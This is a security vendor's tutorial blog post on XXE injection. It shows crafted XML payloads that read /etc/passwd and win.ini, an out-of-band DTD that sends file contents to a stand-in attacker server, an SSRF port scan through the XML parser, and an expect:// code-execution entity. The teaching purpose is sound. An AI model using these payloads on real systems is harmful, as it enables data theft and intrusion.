22 July 2019

A Deep Dive into XXE Injection

Trenton Gordon

Written by Synack Sr. Security Program Analyst Trent Gordon
Editing and vulnerability reference by Senior Manager, Technical Operations Jake Garner

In my career as a Security Program Analyst with Synack, I am privileged to see hundreds of unique attacks, every day, from the best security researchers in the world. These range in complexity, from a simple XSS on a forum post, to highly sophisticated Blind SQL Injections with out-of-band exfiltration via DNS. Sitting on the front lines of web exploitation is humbling; mostly it allows me a unique opportunity to learn from the best by examining new attacks and learning new techniques of exploiting old vulnerabilities. I am able to follow trends in web security and see which attack techniques are more successful than others in the modern web. Of these recent trends, one of my favorite attack types is XML External Entity (XXE) Injection. I find this attack interesting for a number of reasons: it’s widely prevalent, it has numerous different attack vectors, and it remains one of the lesser-known vulnerabilities amongst junior security researchers.

XXE Injection has been on the OWASP Top 10 list for a few years and frequently makes an appearance as a submission from the Synack Red Team (SRT). XXE Injection is not limited to Web Applications; anywhere there is an XML Parser (web, host, software), the potential for XXE exists. A Google search of “XXE Exploits” returns several write-ups of successful XXE attacks, against well-defended targets, often with high bounty payouts.

Despite this, XXE seems to be seldom taught in web security classes, passed over in favor of “easier” attacks such as CSRF and XSS. Of the INFOSEC training I’ve been through, only one course even mentioned XXE, referring to it as an advanced exploitation technique. In an effort to demystify this exploit, I’m going to break down how XXE works, some ways to exploit XXE vulnerabilities, and cover two real-world XXE attacks submitted by the SRT (with redacted data to protect client and SRT identities).

1. XML and its ENTITYs

The best part about XXE is that it is entirely valid functionality of the XML language. There is no black magic with this attack, simply an abusable feature that is frequently enabled by default. This feature is the external entity.
To understand ENTITYs, we must first look at Document Type Definition (DTD) files. DTD files are a special type of XML file that contain information about the format or structure of XML. They are used to establish consistency amongst different, separate, XML files. These DTD files can contain an element called an ENTITY. See below for an example .dtd file:

<!DOCTYPE STRUCTURE [
<!ELEMENT SPECIFICATIONS (#PCDATA)>
<!ENTITY VERSION “1.1”>
<!ENTITY file SYSTEM “file:///c:/server_files/application.conf” >
]>

We won’t split hairs about the syntax of .dtd files, just understand that any XML referencing this .dtd file will need to follow its structure (source).

The ENTITY tags within are simply a shortcut to a special character that can be referenced by the calling XML file (source). Notice that the last ENTITY tag is actually pulling the contents of a local file, via the SYSTEM keyword.

The above .dtd file might be used as follows:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE foo SYSTEM “http://validserver.com/formatting.dtd”>
<specifications>&file;</specifications>

formatting.dtd is called using DOCTYPE tags, and the XML file can reference the ENTITYs and structure within.

ENTITYs can be used without the formality of a full .dtd file. By calling DOCTYPE and using square brackets [], you can reference ENTITY tags for use in only that XML file. Below, the application.conf file is referenced for use in <configuration></configuration> tags, without a full .dtd file to host it:

<?xml version=”1.0″ encoding=”ISO-8859-1″?>
<!DOCTYPE example [
<!ELEMENT example ANY >
<!ENTITY file SYSTEM “file:///c:/server_files/application.conf” >
]>
<configuration>&file;</configuration>

So in broad summary:

  • DTD files can be external or internal to an XML file
  • ENTITYs exist within DTD files
  • ENTITYs can call local system files

2. Injection Fun

When data is passed to the server in an HTTP Request, it opens up the possibility of abuse from the user. XML is no different. The web developers are either placing their trust in the client to not modify the code, or (the better solution) are putting controls in place to prevent malicious modifications from working. Regardless of the web developer’s intent, mistakes happen and injections are often successfully executed on the server. Here is an example, where data from a form is wrapped in XML and sent to the server to be processed. The attacker will:

  • Intercept the vulnerable POST request with a web proxy (Burpsuite, Zap, etc)
  • Add the injected ENTITY tag and &xxe; variable reference.
    • ensure the &xxe; reference is with data that will be returned and displayed
  • Release the intercepted POST request

This will result in the following crafted POST request (injected content in red):

POST /notes/savenote HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml;charset=UTF-8
Host: myserver.com

<?xml version=”1.0″ ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<note>
<to>Alice</to>
<from>Bob</from>
<header>Sync Meeting</header>
<time>1200</time>
<body>Meeting time changed &xxe;</body>
</note>

The server, assuming valid data was inputted into the form, parses this XML data before saving it on the backend, and returns the parsed data along with the original valid data. In this case the contents of /etc/passwd are displayed.

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Server: Microsoft-IIS/7.5
Date: Sat, 19 Apr 2019 13:08:49 GMT
Connection: close
Content-Length: 1039

Note saved! From Bob to Alice about “Sync Meeting” at 1200: Meeting time has changed
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
..snip…

3. Sneaking Out of Band

So that was a fairly contrived example. While I should note that the Synack VulnOps team does occasionally see clear-cut XXEs like this, most of the time the XML passed to the server isn’t displayed/returned in such a favorable way. In instances where XML is injectable, but not returned to the client in the HTTP response, we turn to those external .dtd files mentioned previously. DOCTYPE references to external .dtd files allow us to conduct this attack entirely out-of-band.

We’ll modify the previous example to reflect this. We’re also going to pretend this is a Windows server, for variety. In the previous example, an ENTITY reference to the file was saved into the xxe variable, which gets referenced in the form. In this example, the ENTITY reference is for our external server, https://evil-webserver.com:

POST /notes/savenote HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml;charset=UTF-8.
Host: myserver.com

<?xml version=”1.0″ ?>
<!DOCTYPE hack [
<!ELEMENT x ANY >
<!ENTITY % alpha SYSTEM “https://evil-webserver.com/payload.dtd”>
%alpha;
%bravo;
]>
<x>&charlie;</x>

<note>
<to>Alice</to>
<from>Bob</from>
<header>Sync Meeting</header>
<time>1200</time>
<body>Meeting time changed</body>
</note>

The external payload.dtd contains the following:

<?xml version=”1.0″ encoding=”utf-8″ ?>
<!ENTITY % data SYSTEM “file:///c:/windows/win.ini”>
<!ENTITY % bravo “<!ENTITY % charlie SYSTEM
‘https://evil-webserver.com/?%data;’>”>

Take note that file:///c:/windows/win.ini is contained in the .dtd file, rather than within the injected XXE code. This is a stealthy move that allows us to hide which file we’re trying to extract from server access logs.

So, in general terms, this code executes in the following steps:

  • The client sends the POST request with the injected XML code
    • The server, via the XML parser, parses the XML from top to bottom, reaching the injected““ ENTITY
  • The server requests payload.dtd from https://evil-webserver.com
  • https://evil-webserver.com responds with payload.dtd
  • The code within payload.dtd is parsed by the XML parser, which reads the contents of win.ini and sends it as a parameter in an HTTP GET request back to https://evil-webserver.com

This extracted data can be viewed by the attacker in their web server logs.

Side note: If the various alpha/bravo/charlie variable references in this example are confusing, know that there are various ways of executing the same XXE attack, each in an effort to bypass web filters or appease finicky XML parsers. Some different variations can be found on GitHub here (credit to staaldraad).

4. Pass the SOAP

Take, for example, a submission we once received (sensitive info redacted for client and researcher privacy). An SRT member found a web service that offered numerous SOAP API methods. SOAP (Simple Object Access Protocol) is a communication structure that allows numerous different applications/elements to communicate with each other. More importantly for us, it is also structured as XML, making it possibly vulnerable to XXE.

In this instance, the various API methods had <XMLData> sections that could contain injected ENTITY tags. So, issuing the following POST request to the /ConductOrders.asmx endpoint would generate a request to an attacker’s web server:

As a result, the server will fetch the contents of the external dtd http://evil-webserver/data.xml

This XML code will instruct the XML Parser to send the contents of the local c:\windows\win.ini file in the request to the attacker server, all by appending the charlie variable to the end of the request, making it viewable in the attacker’s server logs:

And just like that, any local file readable by the web server was his to steal.

Note: Permissions matter in this attack. If the web server (or the www-data user) does not have the permissions, it won’t return the file. This is why we pull /etc/passwd instead of /etc/shadow in these Proof of Concept (PoC)s.

5. Recon with XXE

Like many exploits, XXE gets extra interesting when you start chaining it with other vulnerabilities. XXE to gain Local File Disclosure (LFD) is useful as a PoC, but a real attacker might want to do more with XXE than just read local files (especially since this attack is limited by the permissions of the web server). Since XXE is instructing the server to execute something on its behalf, an attacker can use it to map internal hosts and/or ports by using the XML parser to perform Server Side Request Forgery (SSRF). Such an XXE + SSRF submission came across our queue last year. This specific vulnerability was exploited against JAMF Software which has an XML based protocol, like SOAP, making it potentially vulnerable to XXE.

Take note of the second XML line, outlined in red, <!DOCTYPE dtd SYSTEM “https://127.0.0.1:445”>

Rather than calling an external DTD or local file like the previous examples, this researcher instructs the server to call its localhost (127.0.0.1) on a designated port. If the port is open, the server quickly responds. If the port is closed, the server will respond with ICMP Port Unreachable messages, which take time as the socket attempts to renegotiate the handshake. In this instance, the different response times between valid ports and invalid ports were significant enough to blindly map the internal host’s ports. Scaling this same attack in burp intruder resulted in the following:

You can see that the port numbers 21, 22, 23, and 443 returned significantly longer response times, suggesting an invalid internal port. From this attack, the SRT concluded that port 80, 445, and 8443 were internally accessible. Of these, port 445 was of particular interest, as it was not openly accessible to the internet, providing a unique attack surface. If taken further, this SSRF exploitation could then test for internal hosts, providing a method to map the private intranet endpoints that are accessible by the web server.

6. Final Thoughts

XXE Injection can be as simple or as complex as the application allows. Google can quickly show you examples of various advanced XXE attack vectors. The Billion Laughs attack will turn XXE into a Denial of Service (DoS). More nefariously, having the PHP Expect module installed can result in code execution from an XXE attack (<!ENTITY rce SYSTEM “expect://ifconfig” >).
Defenses exist against XXE (OWASP has a list here), but ultimately this is a vulnerability against a weakly configured XML Parser. XXE is not a flaw in XML that can be patched, but rather an exploit against the application where it’s enabled unintentionally or unsanitized. Ultimately it is an attack largely dependent on human error, and that means it’s here to stay.


Already know this stuff? Prove it: https://www.synack.com/red-team/ and use code “SRTBLOGS” in your application.

Researchers on the Synack platform are presented with opportunities to work on unique targets and challenges, the fastest payouts and highest level of support in the industry. Synack’s innovative technology optimizes the Synack Red Team’s (SRT) efficiency in vulnerability discovery.

Synack provides initiatives to help foster the researcher community and to recruit top talent. SRT Levels is a program that rewards SRT members for their increasing contributions to the Synack platform, and incorporates hacking competitions and specialized challenges.